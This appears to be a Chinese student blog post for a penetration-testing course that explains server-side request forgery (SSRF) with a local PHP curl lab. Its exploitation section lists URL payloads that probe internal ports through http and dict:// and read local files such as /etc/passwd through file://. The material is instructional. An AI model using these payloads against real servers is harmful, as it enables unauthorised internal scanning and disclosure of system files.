第四次渗透作业

于 2024-08-24 23:09:26 发布
阅读量247 收藏 10
点赞数 4
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Destiny_12134/article/details/141505128
版权

目录

1. SSRF 概述

1.1 SSRF 场景

1.1.1 PHP 实现

1.2 SSRF 原理

1.3 SSRF 危害

2. SSRF 攻防

2.1 SSRF 利用

2.1.1 文件访问

2.1.2 端口扫描

2.1.3 读取本地文件

1. SSRF 概述


服务器会根据用户提交的URL发送一个HTTP请求。使用用户指定的URL,Web应用可以获取图片或者文件资源等。典型的例子是百度识图功能。

如果没有对用户提交URL和远端服务器所返回的信息做合适的验证或过滤,就有可能存在“请求伪造"的缺陷。“请求伪造”,顾名思义,攻击者伪造正常的请求,以达到攻击的目的。如果“请求伪造”发生在服务器端,那这个漏洞就叫做“服务器端请求伪造”,英文名字Server Side Request Forgery,简称SSRF。

SSRF是一种由攻击者发起的伪造服务器发送的请求的一种攻击。

1.1 SSRF 场景


SSRF漏洞主要出现在需要从服务器向其他资源发送请求的应用程序中,例如图片处理、文件下载、URL 转发等。其中被攻击的目标系统通常位于服务器的内部网络。

1.1.1 PHP 实现


利用curl实现,需要PHP扩展组件curl支持

该实验需要开启curl

在网上复制一个图片的链接https://www.baidu.com/img/PC_wenxin_1142bc061306e094e6eddaa3d9656145.gif

浏览器中输入

http://127.0.0.1/ssrf/ssrf_curl.php?url=http://www.baidu.com/img/PC_wenxin_1142bc061306e094e6eddaa3d9656145.gif

1.2 SSRF 原理


服务器接受了来自于客户端的URL 地址,并由服务器发送该URL 请求。

对用户输入的URL 没有进行恰当的过滤,导致任意URL 输入。

没对响应的结果进行检验,直接输出。

1.3 SSRF 危害


漏洞危害:

内部资产暴露:攻击者可以通过伪造的请求访问内部资源,包括数据库、文件系统、配置文件、读取本地文件等。
敏感信息泄露:攻击者可以利用该漏洞获取敏感信息,例如访问受限 API、执行未经授权的操作等。
进行攻击:攻击者可以通过伪造的请求向其他系统发起攻击,例如内网端口扫描、攻击内网应用、内网Web应用指纹识别、利用其他漏洞等。


2. SSRF 攻防

2.1 SSRF 利用

2.1.1 文件访问
?url=http://www.baidu.com 
?url=http://www.baidu.com/img/bd_logo.png 
?url=http://www.baidu.com/robots.txt

2.1.2 端口扫描
?url=http://127.0.0.1:80 
?url=http://127.0.0.1:3306 
?url=dict://127.0.0.1:3306

?url=http://10.10.10.1:22 
?url=http://10.10.10.1:6379

2.1.3 读取本地文件
?url=file:///c:/windows/system32/drivers/etc/hosts 
?url=file:///etc/passwd

?url=file:/c:/www/ssrf/ssrf_curl.php

Destiny_12134
关注
渗透测试之SSRF服务器端请求伪造漏洞
weixin_45380284的博客
03-06 636
SSRF服务器端请求伪造漏洞 原理: SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人) SSRF 形成的原因 大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档,等等。 原理简析: S
网络渗透作业
qq_67829282的博客
03-16 3058
1、Whois查询 whois是一个标准的互联网协议,在whois查询中,能找到很多跟域名有关的信息,例如域名注册时间,域名所有人,一般的小型网站域名所有人是网站管理员。 常用的查询网址有爱站(https://whois.aizhan.com)站长之家(http://whois.chinaz.com)和Virus Total(https://www.virustotal.com) 2、通过搜索引擎收集敏感信息 Google是世界上最强的搜索引擎之-对一位渗透测试者而言,它可能是款绝住的黑客工具,我们
Web漏洞之SSRF(服务器端请求伪造)
薛定谔嘚喵博客
05-08 1351
如果没有对用户提交URL 和远端服务器所返回的信息做合适的验证或过滤,就有可能存在“请求伪造”的缺陷。“请求伪造”,顾名思义,攻击者伪造正常的请求,以达到攻击的目的。SSRF是一种由攻击者发起的伪造服务器发送的请求的一种攻击。对用户输入的URL 没有进行恰当的过滤,导致任意URL 输入。使用用户指定的URL,Web 应用可以获取图片或者文件资源等。通过SSRF漏洞可以实现对内网的访问,从而可以攻击内网应用。●限制IP,避免应用被用来获取内网数据,攻击内网;●过滤返回信息,只要不符合要求的,全部过滤;
SSRF服务器端请求伪造
2302_79885863的博客
05-12 998
1.社交分享功能:获取超链接的标题等内容进行显示2.转码服务:通过URL地址把原地址的网页内容调优使其适合手机3.屏幕浏览在线翻译:给网址翻译对应网页的内容4.图片加载/下载:例如富文本编辑器中的点击下载图片到本地;5.通过URL地址加载或下载图片云服务厂商:它会远程执行一些命令来判断网站是否存活等,所以如果可以捕获相应的信息,就可以进行ssrf测试6.编码处理7.可以利用google 语法加上这些关键字去寻找SSRF漏洞。从远程服务器请求资源----》找SSRF。
Web Hacking 101 中文版 十七、服务端请求伪造
weixin_34166847的博客
03-28 167
十七、服务端请求伪造 作者:Peter Yaworski 译者:飞龙 协议:CC BY-NC-SA 4.0 描述 服务端请求伪造,或者 SSRF,是一种类型,它允许攻击者使用目标服务器来代表攻击者自己执行 HTTP 请求。这和 CSRF 类似,因为两个漏洞都执行了 HTTP 请求,而不被受害者察觉。在 SSRF 中,受害者是漏洞服务器...
服务器端请求伪造(SSRF)
永远相信美好的事情即将发生
11-18 523
SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造形成的由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要攻击目标网站的内部系统。(因为内部系统无法从外网访问,所以要把目标网站当做中间人来攻击内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档,等等。
上海开放大学市场营销学第一次网上记分作业答案.zip
03-03
这次的“第一次网上记分作业答案”提供了深入探讨和学习市场营销学的机会。 在解答市场营销学的作业时,学生需要考虑以下几个核心概念: 1. 市场调研:这是了解消费者需求、竞争对手状况和行业趋势的基础。通过...
渗透测试作业
weixin_65908240的博客
03-08 4725
1.1 Whois 查询 Whois是一个标准的互联网协议,可用于收集网络注册信息,注册的域名、IP地址等信息。简单来说,Whois就是一个用于查询域名是否已被注册以及注册域名的详细信息的数据库(如域名所有人、域名注册商)。在Whois查询中,得到注册人的姓名和邮箱信息通常对测试个人站点非常有用,因为我们可以通过搜索引擎和社交网络挖掘出域名所有人的很多信息。对中小站点而言,域名所有人往往就是管理员。 在Kali系统中,Whois已经默认安装,只需输入要查询的域名即可。 1.1.2 备案信息查询 网站备案是
中国石油大学(北京)测井第1次在线作业答案.docx
10-24
### 4. 岩石电阻率最低的情况 - **选项解析**:在给出的选项中,沉积岩的电阻率通常较低(选项C正确)。因此,正确答案是**C**。 ### 5. 电极距变化对探测深度的影响 - **概念**:电极距的增大通常会导致探测深度...
中石油北京20年春《国际营销》第三次在线作业标准答案.docx
10-24
15. 国际营销策略:新产品导入期可能采用的策略包括快速撇脂策略(B)、缓慢撇脂策略(C)、快速渗透策略(D)和缓慢渗透策略(E)。 16. 地理扩张策略:企业可以选择产品和促销直接延伸策略(A)、产品直接延伸、促销改变...
服务器端请求伪造--SSRF
2401_84466336的博客
05-29 1050
SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。
SSRF(服务器端请求伪造)
qq_56289291的博客
08-02 1688
服务器端请求伪造(SSRFServer-SideRequestForgery)是一个Web安全漏洞,指攻击者诱导服务器将HTTP请求发送到攻击者选择的一个目标上。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。例如通过127.0.0.1就能访问本机,192.168.*.*就能访问内网C段。...
SSRF-服务器端请求伪造
klcyl_0106的博客
07-15 777
SSRF漏洞
SSRF服务端请求伪造漏洞
m0_57379855的博客
03-11 689
SSRF服务端请求伪造漏洞SSRF服务端请求伪造漏洞php-curl扩展curl其他协议php危险函数SSRF利用方式pikachuSSRFSSRF修复防御 SSRF服务端请求伪造漏洞 服务端请求伪造攻击(Server-side Request Forgery) 很多web应用都提供了从其他的服务器上获取数据的功能。 使用用户指定的URL, web应用可以获取图片。下载文件,读取文件内容等。 这个功能如果被恶意使用,可以利用存在缺陷的web应用作 为代理攻击远程和本地的服务器.这种形式的攻击称为服务端请求伪
【Web常规漏洞】SSRF服务端请求伪造漏洞
soldi_er的博客
09-16 1013
文章目录参考 概念 —— 产生原因 ——可能存在漏洞的代码 ——漏洞分类 —— 潜在危害 漏洞利用 —— 漏洞防御 —— 漏洞绕过 概念:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种利用漏洞伪造服务器端发起请求。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 漏洞产生原因:服务端提供从其他服务器应用获取数据的功能,但没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容、加载指定地址的图片、下载等。 可能存在SSRF漏洞的PHP代码:
Web安全基础学习:SSRF服务端请求伪造漏洞
最新发布
qq_51862722的博客
06-21 892
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造请求,利用服务器端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务器端发起的,所以服务器能请求到与自身相连而外网隔离的内部系统)。
【CTF】SSRF服务器端请求伪造
qq_53099119的博客
04-02 2568
从本题来看,他说他在baidu.com下放了一个flag.txt,但是试想一下,这个baidu.com是不可能为真正的百度的那个域名的,所以此处这个baidu.com应该为出题者所建的一个目录,所以就是ssrf读文件,我们就想到使用file协议来读取flag.txt这个文件。此处表示,截取所输入内容中的从第7位开始,长度为9的字符串,如果他的内容为baidu.com,那么程序也会die,而且我们所需要用的file://协议恰巧与http://协议长度相同,就很气人。
初识——服务器端请求伪造(SSRF)
sGanYu
08-16 1558
SSRF:Server-Side Request Forgery服务器请求伪造。 一种由攻击者构造请求,由服务器端发起请求的安全漏洞,漏洞属于信息泄露的一种。一般情况下,SSRF的攻击目标是网站的内部系统(正因为请求是由服务器端发起的,所以服务器能请求到与自身相连而与外网隔离的内部系统),只要当前服务器有向其他服务器发送请求的地方都可能存在SSRF漏洞。 漏洞原理: 大多数web应用都提供了从其他服务器上获取数据的功能,web应用根据用户指定的URL向其他服务器请求图片,文件等资源。一旦..
头歌实训作业答案JAVA
09-21
引用:Educoder头歌实践平台 中 Java 数据结构之图 共4关 金币共2300 的那个实践项目答案由于图论问题渗透整个计算机科学,图算法对于计算机学科至关重要。成百上千的计算问题最后都可以归约为图论问题。引用:第一关...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值